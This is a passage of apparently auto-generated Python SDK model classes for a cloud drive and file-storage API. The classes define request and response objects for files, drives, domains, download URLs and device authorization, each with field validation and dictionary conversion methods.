result['is_vpc'] = self.is_vpc
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('biz_cname') is not None:
self.biz_cname = m.get('biz_cname')
if m.get('cert_id') is not None:
self.cert_id = m.get('cert_id')
if m.get('cname_type') is not None:
self.cname_type = m.get('cname_type')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('is_vpc') is not None:
self.is_vpc = m.get('is_vpc')
return self
class DeleteDataCNameAndCertRequest(TeaModel):
"""
*\
"""
def __init__(
self,
data_cname: str = None,
domain_id: str = None,
location: str = None,
):
# cn-shanghai data cname
self.data_cname = data_cname
# domain ID
self.domain_id = domain_id
# location
self.location = location
def validate(self):
self.validate_required(self.data_cname, 'data_cname')
self.validate_required(self.domain_id, 'domain_id')
self.validate_required(self.location, 'location')
def to_map(self):
result = dict()
if self.data_cname is not None:
result['data_cname'] = self.data_cname
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.location is not None:
result['location'] = self.location
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('data_cname') is not None:
self.data_cname = m.get('data_cname')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('location') is not None:
self.location = m.get('location')
return self
class DeleteDomainRequest(TeaModel):
"""
delete domain request
"""
def __init__(
self,
domain_id: str = None,
):
# Domain ID
self.domain_id = domain_id
def validate(self):
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
return self
class DeleteDriveResponse(TeaModel):
"""
delete drive response
"""
def __init__(self):
pass
def validate(self):
pass
def to_map(self):
result = dict()
return result
def from_map(self, m: dict = None):
m = m or dict()
return self
class DeleteFileResponse(TeaModel):
"""
删除文件 response
"""
def __init__(
self,
async_task_id: str = None,
domain_id: str = None,
drive_id: str = None,
file_id: str = None,
):
# async_task_id
self.async_task_id = async_task_id
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
# file_id
self.file_id = file_id
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
def to_map(self):
result = dict()
if self.async_task_id is not None:
result['async_task_id'] = self.async_task_id
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.file_id is not None:
result['file_id'] = self.file_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('async_task_id') is not None:
self.async_task_id = m.get('async_task_id')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
return self
class DeleteFilesResponse(TeaModel):
"""
批量删除文件 response
"""
def __init__(
self,
deleted_file_id_list: List[str] = None,
domain_id: str = None,
drive_id: str = None,
):
# deleted_file_id_list
self.deleted_file_id_list = deleted_file_id_list
# domain_id
self.domain_id = domain_id
# drive_id
self.drive_id = drive_id
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
def to_map(self):
result = dict()
if self.deleted_file_id_list is not None:
result['deleted_file_id_list'] = self.deleted_file_id_list
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deleted_file_id_list') is not None:
self.deleted_file_id_list = m.get('deleted_file_id_list')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
return self
class DeviceAuthorizeRequest(TeaModel):
"""
*\
"""
def __init__(
self,
client_id: str = None,
device_info: str = None,
device_name: str = None,
login_type: str = None,
scope: List[str] = None,
):
# Client ID, 此处填写创建App时返回的AppID
self.client_id = client_id
# 设备信息,用于用户识别设备
self.device_info = device_info
# 设备名,实现方需保证不同设备的设备名不重复(推荐用硬件名称+硬件型号作为设备名)
self.device_name = device_name
# 鉴权方式,目前支持ding,ram鉴权
self.login_type = login_type
# 申请的权限列表, 默认为所有权限
self.scope = scope
def validate(self):
self.validate_required(self.client_id, 'client_id')
self.validate_required(self.device_name, 'device_name')
def to_map(self):
result = dict()
if self.client_id is not None:
result['ClientID'] = self.client_id
if self.device_info is not None:
result['DeviceInfo'] = self.device_info
if self.device_name is not None:
result['DeviceName'] = self.device_name
if self.login_type is not None:
result['LoginType'] = self.login_type
if self.scope is not None:
result['Scope'] = self.scope
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('ClientID') is not None:
self.client_id = m.get('ClientID')
if m.get('DeviceInfo') is not None:
self.device_info = m.get('DeviceInfo')
if m.get('DeviceName') is not None:
self.device_name = m.get('DeviceName')
if m.get('LoginType') is not None:
self.login_type = m.get('LoginType')
if m.get('Scope') is not None:
self.scope = m.get('Scope')
return self
class FileDeltaResponse(TeaModel):
"""
the file op info
"""
def __init__(
self,
current_category: str = None,
file: BaseCCPFileResponse = None,
file_id: str = None,
op: str = None,
):
self.current_category = current_category
self.file = file
self.file_id = file_id
self.op = op
def validate(self):
if self.file:
self.file.validate()
def to_map(self):
result = dict()
if self.current_category is not None:
result['current_category'] = self.current_category
if self.file is not None:
result['file'] = self.file.to_map()
if self.file_id is not None:
result['file_id'] = self.file_id
if self.op is not None:
result['op'] = self.op
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('current_category') is not None:
self.current_category = m.get('current_category')
if m.get('file') is not None:
temp_model = BaseCCPFileResponse()
self.file = temp_model.from_map(m['file'])
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('op') is not None:
self.op = m.get('op')
return self
class GetAccessTokenByLinkInfoRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
extra: str = None,
identity: str = None,
type: str = None,
):
self.headers = headers
# 额外的信息,比如type为mobile时,此字段为国家编号,不填默认86
self.extra = extra
# 唯一身份标识
self.identity = identity
# 认证类型
self.type = type
def validate(self):
self.validate_required(self.identity, 'identity')
self.validate_required(self.type, 'type')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.extra is not None:
result['extra'] = self.extra
if self.identity is not None:
result['identity'] = self.identity
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('extra') is not None:
self.extra = m.get('extra')
if m.get('identity') is not None:
self.identity = m.get('identity')
if m.get('type') is not None:
self.type = m.get('type')
return self
class GetAppPublicKeyRequest(TeaModel):
"""
*\
"""
def __init__(
self,
app_id: str = None,
):
# App ID
self.app_id = app_id
def validate(self):
self.validate_required(self.app_id, 'app_id')
def to_map(self):
result = dict()
if self.app_id is not None:
result['app_id'] = self.app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
return self
class GetAppRequest(TeaModel):
"""
*\
"""
def __init__(
self,
app_id: str = None,
):
# App ID
self.app_id = app_id
def validate(self):
self.validate_required(self.app_id, 'app_id')
def to_map(self):
result = dict()
if self.app_id is not None:
result['app_id'] = self.app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
return self
class GetAsyncTaskResponse(TeaModel):
"""
Get AsyncTask Response
"""
def __init__(
self,
async_task_id: str = None,
consumed_process: int = None,
err_code: int = None,
message: str = None,
state: str = None,
total_process: int = None,
url: str = None,
):
# async_task_id
type:string
self.async_task_id = async_task_id
# consumed_process
self.consumed_process = consumed_process
# err_code
self.err_code = err_code
# message
self.message = message
# state
self.state = state
# total_process
self.total_process = total_process
# download_url
example
self.url = url
def validate(self):
pass
def to_map(self):
result = dict()
if self.async_task_id is not None:
result['async_task_id'] = self.async_task_id
if self.consumed_process is not None:
result['consumed_process'] = self.consumed_process
if self.err_code is not None:
result['err_code'] = self.err_code
if self.message is not None:
result['message'] = self.message
if self.state is not None:
result['state'] = self.state
if self.total_process is not None:
result['total_process'] = self.total_process
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('async_task_id') is not None:
self.async_task_id = m.get('async_task_id')
if m.get('consumed_process') is not None:
self.consumed_process = m.get('consumed_process')
if m.get('err_code') is not None:
self.err_code = m.get('err_code')
if m.get('message') is not None:
self.message = m.get('message')
if m.get('state') is not None:
self.state = m.get('state')
if m.get('total_process') is not None:
self.total_process = m.get('total_process')
if m.get('url') is not None:
self.url = m.get('url')
return self
class GetBizCNameInfoRequest(TeaModel):
"""
*\
"""
def __init__(
self,
cname_type: str = None,
domain_id: str = None,
is_vpc: bool = None,
):
# cname type
self.cname_type = cname_type
# domain ID
self.domain_id = domain_id
# is vpc
self.is_vpc = is_vpc
def validate(self):
self.validate_required(self.cname_type, 'cname_type')
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.cname_type is not None:
result['cname_type'] = self.cname_type
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.is_vpc is not None:
result['is_vpc'] = self.is_vpc
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('cname_type') is not None:
self.cname_type = m.get('cname_type')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('is_vpc') is not None:
self.is_vpc = m.get('is_vpc')
return self
class GetByLinkInfoRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
extra: str = None,
identity: str = None,
type: str = None,
):
self.headers = headers
# 额外的信息,比如type为mobile时,此字段为国家编号,不填默认86
self.extra = extra
# 唯一身份标识
self.identity = identity
# 认证类型
self.type = type
def validate(self):
self.validate_required(self.identity, 'identity')
self.validate_required(self.type, 'type')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.extra is not None:
result['extra'] = self.extra
if self.identity is not None:
result['identity'] = self.identity
if self.type is not None:
result['type'] = self.type
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('extra') is not None:
self.extra = m.get('extra')
if m.get('identity') is not None:
self.identity = m.get('identity')
if m.get('type') is not None:
self.type = m.get('type')
return self
class GetCaptchaRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
app_id: str = None,
):
self.headers = headers
# App ID, 当前访问的App
self.app_id = app_id
def validate(self):
self.validate_required(self.app_id, 'app_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.app_id is not None:
result['app_id'] = self.app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
return self
class GetCorsRuleListRequest(TeaModel):
"""
*\
"""
def __init__(
self,
domain_id: str = None,
):
# domain ID
self.domain_id = domain_id
def validate(self):
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
return self
class GetDataCNameInfoRequest(TeaModel):
"""
*\
"""
def __init__(
self,
domain_id: str = None,
):
# domain ID
self.domain_id = domain_id
def validate(self):
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
return self
class GetDirSizeInfoResponse(TeaModel):
"""
获取文件夹size信息
"""
def __init__(
self,
dir_count: int = None,
file_count: int = None,
size: int = None,
):
# dir_count
self.dir_count = dir_count
# file_count
self.file_count = file_count
# size
self.size = size
def validate(self):
pass
def to_map(self):
result = dict()
if self.dir_count is not None:
result['dir_count'] = self.dir_count
if self.file_count is not None:
result['file_count'] = self.file_count
if self.size is not None:
result['size'] = self.size
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('dir_count') is not None:
self.dir_count = m.get('dir_count')
if m.get('file_count') is not None:
self.file_count = m.get('file_count')
if m.get('size') is not None:
self.size = m.get('size')
return self
class GetDomainRequest(TeaModel):
"""
get domain request
"""
def __init__(
self,
domain_id: str = None,
):
# Domain ID
self.domain_id = domain_id
def validate(self):
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.domain_id is not None:
result['domain_id'] = self.domain_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
return self
class RateLimit(TeaModel):
"""
下载限速配置
"""
def __init__(
self,
part_size: int = None,
part_speed: int = None,
):
self.part_size = part_size
self.part_speed = part_speed
def validate(self):
pass
def to_map(self):
result = dict()
if self.part_size is not None:
result['part_size'] = self.part_size
if self.part_speed is not None:
result['part_speed'] = self.part_speed
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('part_size') is not None:
self.part_size = m.get('part_size')
if m.get('part_speed') is not None:
self.part_speed = m.get('part_speed')
return self
class GetDownloadUrlResponse(TeaModel):
"""
获取download url response
"""
def __init__(
self,
expiration: str = None,
method: str = None,
ratelimit: RateLimit = None,
size: int = None,
streams_url: dict = None,
url: str = None,
):
# expiration
self.expiration = expiration
# method
self.method = method
self.ratelimit = ratelimit
# size
self.size = size
# streams url info
self.streams_url = streams_url
# url
self.url = url
def validate(self):
if self.ratelimit:
self.ratelimit.validate()
def to_map(self):
result = dict()
if self.expiration is not None:
result['expiration'] = self.expiration
if self.method is not None:
result['method'] = self.method
if self.ratelimit is not None:
result['ratelimit'] = self.ratelimit.to_map()
if self.size is not None:
result['size'] = self.size
if self.streams_url is not None:
result['streams_url'] = self.streams_url
if self.url is not None:
result['url'] = self.url
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('expiration') is not None:
self.expiration = m.get('expiration')
if m.get('method') is not None:
self.method = m.get('method')
if m.get('ratelimit') is not None:
temp_model = RateLimit()
self.ratelimit = temp_model.from_map(m['ratelimit'])
if m.get('size') is not None:
self.size = m.get('size')
if m.get('streams_url') is not None:
self.streams_url = m.get('streams_url')
if m.get('url') is not None:
self.url = m.get('url')
return self
class GetDriveResponse(TeaModel):
"""
Get drive response
"""
def __init__(
self,
creator: str = None,
description: str = None,
domain_id: str = None,
drive_id: str = None,
drive_name: str = None,
drive_type: str = None,
encrypt_data_access: bool = None,
encrypt_mode: str = None,
owner: str = None,
relative_path: str = None,
status: str = None,
store_id: str = None,
total_size: int = None,
used_size: int = None,
):
# Drive 创建者
self.creator = creator
# Drive 备注信息
self.description = description
# Domain ID
self.domain_id = domain_id
# Drive ID
self.drive_id = drive_id
# Drive 名称
self.drive_name = drive_name
# Drive 类型
self.drive_type = drive_type
self.encrypt_data_access = encrypt_data_access
self.encrypt_mode = encrypt_mode
# Drive 所有者
self.owner = owner
# Drive存储基于store的相对路径,domain的PathType为OSSPath时返回
self.relative_path = relative_path
# Drive 状态
self.status = status
# 存储 ID, domain的PathType为OSSPath时返回
self.store_id = store_id
# Drive 空间总量
self.total_size = total_size
# Drive 空间已使用量
self.used_size = used_size
def validate(self):
pass
def to_map(self):
result = dict()
if self.creator is not None:
result['creator'] = self.creator
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.drive_name is not None:
result['drive_name'] = self.drive_name
if self.drive_type is not None:
result['drive_type'] = self.drive_type
if self.encrypt_data_access is not None:
result['encrypt_data_access'] = self.encrypt_data_access
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.owner is not None:
result['owner'] = self.owner
if self.relative_path is not None:
result['relative_path'] = self.relative_path
if self.status is not None:
result['status'] = self.status
if self.store_id is not None:
result['store_id'] = self.store_id
if self.total_size is not None:
result['total_size'] = self.total_size
if self.used_size is not None:
result['used_size'] = self.used_size
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('creator') is not None:
self.creator = m.get('creator')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('drive_name') is not None:
self.drive_name = m.get('drive_name')
if m.get('drive_type') is not None:
self.drive_type = m.get('drive_type')
if m.get('encrypt_data_access') is not None:
self.encrypt_data_access = m.get('encrypt_data_access')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('owner') is not None:
self.owner = m.get('owner')
if m.get('relative_path') is not None:
self.relative_path = m.get('relative_path')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('store_id') is not None:
self.store_id = m.get('store_id')
if m.get('total_size') is not None:
self.total_size = m.get('total_size')
if m.get('used_size') is not None:
self.used_size = m.get('used_size')
return self
class GetFileByPathResponse(TeaModel):
"""
根据路径获取文件元数据response
"""
def __init__(
self,
category: str = None,
characteristic_hash: str = None,
content_hash: str = None,
content_hash_name: str = None,
content_type: str = None,
crc_64hash: str = None,
created_at: str = None,
description: str = None,
domain_id: str = None,
download_url: str = None,
drive_id: str = None,
encrypt_mode: str = None,
file_extension: str = None,
file_id: str = None,
hidden: bool = None,
image_media_metadata: ImageMediaResponse = None,
labels: List[str] = None,
meta: str = None,
name: str = None,
parent_file_id: str = None,
punish_flag: int = None,
share_id: str = None,
size: int = None,
starred: bool = None,
status: str = None,
streams_info: dict = None,
thumbnail: str = None,
trashed_at: str = None,
type: str = None,
updated_at: str = None,
upload_id: str = None,
url: str = None,
user_meta: str = None,
video_media_metadata: VideoMediaResponse = None,
video_preview_metadata: VideoPreviewResponse = None,
):
# category
self.category = category
# CharacteristicHash
self.characteristic_hash = characteristic_hash
# Content Hash
self.content_hash = content_hash
# content_hash_name
self.content_hash_name = content_hash_name
# content_type
self.content_type = content_type
# crc64_hash
self.crc_64hash = crc_64hash
# created_at
self.created_at = created_at
# description
self.description = description
# DomainID
self.domain_id = domain_id
# download_url
self.download_url = download_url
# drive_id
self.drive_id = drive_id
# encrypt_mode
self.encrypt_mode = encrypt_mode
# file_extension
self.file_extension = file_extension
# file_id
self.file_id = file_id
# Hidden
type: boolean
self.hidden = hidden
self.image_media_metadata = image_media_metadata
# labels
self.labels = labels
self.meta = meta
# name
self.name = name
# parent_file_id
self.parent_file_id = parent_file_id
self.punish_flag = punish_flag
self.share_id = share_id
# Size
self.size = size
# starred
type: boolean
self.starred = starred
# status
self.status = status
# @Deprecated streams url info
self.streams_info = streams_info
# thumbnail
self.thumbnail = thumbnail
# trashed_at
self.trashed_at = trashed_at
# type
self.type = type
# updated_at
self.updated_at = updated_at
# upload_id
self.upload_id = upload_id
# url
self.url = url
# user_meta
self.user_meta = user_meta
self.video_media_metadata = video_media_metadata
self.video_preview_metadata = video_preview_metadata
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
if self.image_media_metadata:
self.image_media_metadata.validate()
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
if self.parent_file_id is not None:
self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
if self.video_media_metadata:
self.video_media_metadata.validate()
if self.video_preview_metadata:
self.video_preview_metadata.validate()
def to_map(self):
result = dict()
if self.category is not None:
result['category'] = self.category
if self.characteristic_hash is not None:
result['characteristic_hash'] = self.characteristic_hash
if self.content_hash is not None:
result['content_hash'] = self.content_hash
if self.content_hash_name is not None:
result['content_hash_name'] = self.content_hash_name
if self.content_type is not None:
result['content_type'] = self.content_type
if self.crc_64hash is not None:
result['crc64_hash'] = self.crc_64hash
if self.created_at is not None:
result['created_at'] = self.created_at
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.download_url is not None:
result['download_url'] = self.download_url
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.file_extension is not None:
result['file_extension'] = self.file_extension
if self.file_id is not None:
result['file_id'] = self.file_id
if self.hidden is not None:
result['hidden'] = self.hidden
if self.image_media_metadata is not None:
result['image_media_metadata'] = self.image_media_metadata.to_map()
if self.labels is not None:
result['labels'] = self.labels
if self.meta is not None:
result['meta'] = self.meta
if self.name is not None:
result['name'] = self.name
if self.parent_file_id is not None:
result['parent_file_id'] = self.parent_file_id
if self.punish_flag is not None:
result['punish_flag'] = self.punish_flag
if self.share_id is not None:
result['share_id'] = self.share_id
if self.size is not None:
result['size'] = self.size
if self.starred is not None:
result['starred'] = self.starred
if self.status is not None:
result['status'] = self.status
if self.streams_info is not None:
result['streams_info'] = self.streams_info
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.trashed_at is not None:
result['trashed_at'] = self.trashed_at
if self.type is not None:
result['type'] = self.type
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.upload_id is not None:
result['upload_id'] = self.upload_id
if self.url is not None:
result['url'] = self.url
if self.user_meta is not None:
result['user_meta'] = self.user_meta
if self.video_media_metadata is not None:
result['video_media_metadata'] = self.video_media_metadata.to_map()
if self.video_preview_metadata is not None:
result['video_preview_metadata'] = self.video_preview_metadata.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('category') is not None:
self.category = m.get('category')
if m.get('characteristic_hash') is not None:
self.characteristic_hash = m.get('characteristic_hash')
if m.get('content_hash') is not None:
self.content_hash = m.get('content_hash')
if m.get('content_hash_name') is not None:
self.content_hash_name = m.get('content_hash_name')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
if m.get('crc64_hash') is not None:
self.crc_64hash = m.get('crc64_hash')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('download_url') is not None:
self.download_url = m.get('download_url')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('file_extension') is not None:
self.file_extension = m.get('file_extension')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('hidden') is not None:
self.hidden = m.get('hidden')
if m.get('image_media_metadata') is not None:
temp_model = ImageMediaResponse()
self.image_media_metadata = temp_model.from_map(m['image_media_metadata'])
if m.get('labels') is not None:
self.labels = m.get('labels')
if m.get('meta') is not None:
self.meta = m.get('meta')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('parent_file_id') is not None:
self.parent_file_id = m.get('parent_file_id')
if m.get('punish_flag') is not None:
self.punish_flag = m.get('punish_flag')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('size') is not None:
self.size = m.get('size')
if m.get('starred') is not None:
self.starred = m.get('starred')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('streams_info') is not None:
self.streams_info = m.get('streams_info')
if m.get('thumbnail') is not None:
self.thumbnail = m.get('thumbnail')
if m.get('trashed_at') is not None:
self.trashed_at = m.get('trashed_at')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('upload_id') is not None:
self.upload_id = m.get('upload_id')
if m.get('url') is not None:
self.url = m.get('url')
if m.get('user_meta') is not None:
self.user_meta = m.get('user_meta')
if m.get('video_media_metadata') is not None:
temp_model = VideoMediaResponse()
self.video_media_metadata = temp_model.from_map(m['video_media_metadata'])
if m.get('video_preview_metadata') is not None:
temp_model = VideoPreviewResponse()
self.video_preview_metadata = temp_model.from_map(m['video_preview_metadata'])
return self
class GetFileResponse(TeaModel):
"""
获取文件元数据response
"""
def __init__(
self,
category: str = None,
characteristic_hash: str = None,
content_hash: str = None,
content_hash_name: str = None,
content_type: str = None,
crc_64hash: str = None,
created_at: str = None,
description: str = None,
domain_id: str = None,
download_url: str = None,
drive_id: str = None,
encrypt_mode: str = None,
file_extension: str = None,
file_id: str = None,
hidden: bool = None,
image_media_metadata: ImageMediaResponse = None,
labels: List[str] = None,
meta: str = None,
name: str = None,
parent_file_id: str = None,
punish_flag: int = None,
share_id: str = None,
size: int = None,
starred: bool = None,
status: str = None,
streams_info: dict = None,
thumbnail: str = None,
trashed_at: str = None,
type: str = None,
updated_at: str = None,
upload_id: str = None,
url: str = None,
user_meta: str = None,
video_media_metadata: VideoMediaResponse = None,
video_preview_metadata: VideoPreviewResponse = None,
):
# category
self.category = category
# CharacteristicHash
self.characteristic_hash = characteristic_hash
# Content Hash
self.content_hash = content_hash
# content_hash_name
self.content_hash_name = content_hash_name
# content_type
self.content_type = content_type
# crc64_hash
self.crc_64hash = crc_64hash
# created_at
self.created_at = created_at
# description
self.description = description
# DomainID
self.domain_id = domain_id
# download_url
self.download_url = download_url
# drive_id
self.drive_id = drive_id
# encrypt_mode
self.encrypt_mode = encrypt_mode
# file_extension
self.file_extension = file_extension
# file_id
self.file_id = file_id
# Hidden
type: boolean
self.hidden = hidden
self.image_media_metadata = image_media_metadata
# labels
self.labels = labels
self.meta = meta
# name
self.name = name
# parent_file_id
self.parent_file_id = parent_file_id
self.punish_flag = punish_flag
self.share_id = share_id
# Size
self.size = size
# starred
type: boolean
self.starred = starred
# status
self.status = status
# @Deprecated streams url info
self.streams_info = streams_info
# thumbnail
self.thumbnail = thumbnail
# trashed_at
self.trashed_at = trashed_at
# type
self.type = type
# updated_at
self.updated_at = updated_at
# upload_id
self.upload_id = upload_id
# url
self.url = url
# user_meta
self.user_meta = user_meta
self.video_media_metadata = video_media_metadata
self.video_preview_metadata = video_preview_metadata
def validate(self):
if self.domain_id is not None:
self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
if self.image_media_metadata:
self.image_media_metadata.validate()
self.validate_required(self.name, 'name')
if self.name is not None:
self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
if self.parent_file_id is not None:
self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
if self.size is not None:
self.validate_maximum(self.size, 'size', 53687091200)
self.validate_minimum(self.size, 'size', 0)
if self.video_media_metadata:
self.video_media_metadata.validate()
if self.video_preview_metadata:
self.video_preview_metadata.validate()
def to_map(self):
result = dict()
if self.category is not None:
result['category'] = self.category
if self.characteristic_hash is not None:
result['characteristic_hash'] = self.characteristic_hash
if self.content_hash is not None:
result['content_hash'] = self.content_hash
if self.content_hash_name is not None:
result['content_hash_name'] = self.content_hash_name
if self.content_type is not None:
result['content_type'] = self.content_type
if self.crc_64hash is not None:
result['crc64_hash'] = self.crc_64hash
if self.created_at is not None:
result['created_at'] = self.created_at
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.download_url is not None:
result['download_url'] = self.download_url
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.file_extension is not None:
result['file_extension'] = self.file_extension
if self.file_id is not None:
result['file_id'] = self.file_id
if self.hidden is not None:
result['hidden'] = self.hidden
if self.image_media_metadata is not None:
result['image_media_metadata'] = self.image_media_metadata.to_map()
if self.labels is not None:
result['labels'] = self.labels
if self.meta is not None:
result['meta'] = self.meta
if self.name is not None:
result['name'] = self.name
if self.parent_file_id is not None:
result['parent_file_id'] = self.parent_file_id
if self.punish_flag is not None:
result['punish_flag'] = self.punish_flag
if self.share_id is not None:
result['share_id'] = self.share_id
if self.size is not None:
result['size'] = self.size
if self.starred is not None:
result['starred'] = self.starred
if self.status is not None:
result['status'] = self.status
if self.streams_info is not None:
result['streams_info'] = self.streams_info
if self.thumbnail is not None:
result['thumbnail'] = self.thumbnail
if self.trashed_at is not None:
result['trashed_at'] = self.trashed_at
if self.type is not None:
result['type'] = self.type
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.upload_id is not None:
result['upload_id'] = self.upload_id
if self.url is not None:
result['url'] = self.url
if self.user_meta is not None:
result['user_meta'] = self.user_meta
if self.video_media_metadata is not None:
result['video_media_metadata'] = self.video_media_metadata.to_map()
if self.video_preview_metadata is not None:
result['video_preview_metadata'] = self.video_preview_metadata.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('category') is not None:
self.category = m.get('category')
if m.get('characteristic_hash') is not None:
self.characteristic_hash = m.get('characteristic_hash')
if m.get('content_hash') is not None:
self.content_hash = m.get('content_hash')
if m.get('content_hash_name') is not None:
self.content_hash_name = m.get('content_hash_name')
if m.get('content_type') is not None:
self.content_type = m.get('content_type')
